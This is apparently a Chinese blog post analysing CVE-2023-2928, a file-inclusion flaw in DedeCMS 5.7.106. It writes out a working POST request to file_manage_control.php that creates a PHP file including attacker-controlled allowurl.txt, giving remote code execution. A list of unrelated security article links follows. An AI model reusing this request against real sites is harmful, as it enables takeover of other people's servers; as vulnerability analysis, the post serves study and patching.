CVE-2023-2928 DedeCMS 文件包含漏洞getshell 漏洞分析

DedeCMS(也称为织梦CMS)是一款基于PHP+MySQL的开源内容管理系统。

在 DedeCMS 5.7.106 及之前的版本中发现一个漏洞。它已被宣布为关键。受此漏洞影响的是未知功能的文件uploads/dede/article_allowurl_edit.php。对参数 allurls 的操作会导致代码注入。攻击可以远程发起。该漏洞已向公众披露并可能被使用。此漏洞的关联标识符为 VDB-230083。

漏洞复现

访问article_allowurl_edit.php页面 保存超链接

访问file_manage_control.php 利用文件包含构造1.php

POST /dede/file_manage_control.php HTTP/1.1

fmdo=edit&backurl=&token=&activepath=&filename=1.php&str=<?php Include_once("./data/admin/allowurl.txt"); ?>&B1=++%E4%BF%9D+%E5%AD%98++

访问1.php

漏洞分析

article_allowurl_edit.php

可以将用户输入的字符保存到/admin/allowurl.txt ,因为有stripslashes函数的过滤xss无效

file_manage_control.php

这里就不分析后端了 我们之前看这个页面的功能

file_manage_control.php 页面为用户提供了网站文件管理的功能,

尝试在php中或txt中添加php执行代码结果被检测了

这样的话一般的利用方式就不行了,好在cms没用禁用掉文件包含的逻辑,我们可以利用/admin/allowurl.txt 这个文件,实现文件包含任意代码执行。

创建文件1.php

其内容为<?php Include_once("./data/admin/allowurl.txt"); ?>

之后访问1.php 即可执行我们想要的代码

相关推荐
介一安全16 分钟前
【APK安全】系统管理器安全风险与防御指南
网络安全·安全性测试·apk安全·android测试
安当加密19 分钟前
SLA操作系统双因素认证实现Windows远程桌面OTP双因子安全登录—从零搭建企业级RDP安全加固体系
windows·安全
你的人类朋友1 小时前
HTTP请求结合HMAC增加安全性
前端·后端·安全
Hello.Reader3 小时前
优化 Flink 基于状态的 ETL少 Shuffle、不膨胀、可落地的工程
flink·php·etl
Dest1ny-安全4 小时前
2025年,今后需要进步的方面
安全
BenSmith4 小时前
一次入门向v8漏洞复现
安全
ZHOU_WUYI5 小时前
构建AI安全防线:基于越狱检测的智能客服守护系统
人工智能·安全
萧鼎6 小时前
深入理解 Python `ssl` 库:安全通信的基石
python·安全·ssl
SteveRocket6 小时前
【产品篇】网络安全运营建设 相关工具
安全·web安全·www.mdrsec.com·cto plus技术服务栈
weixin_446260857 小时前
全新体验:利用Istio提升微服务安全与监控
安全·微服务·istio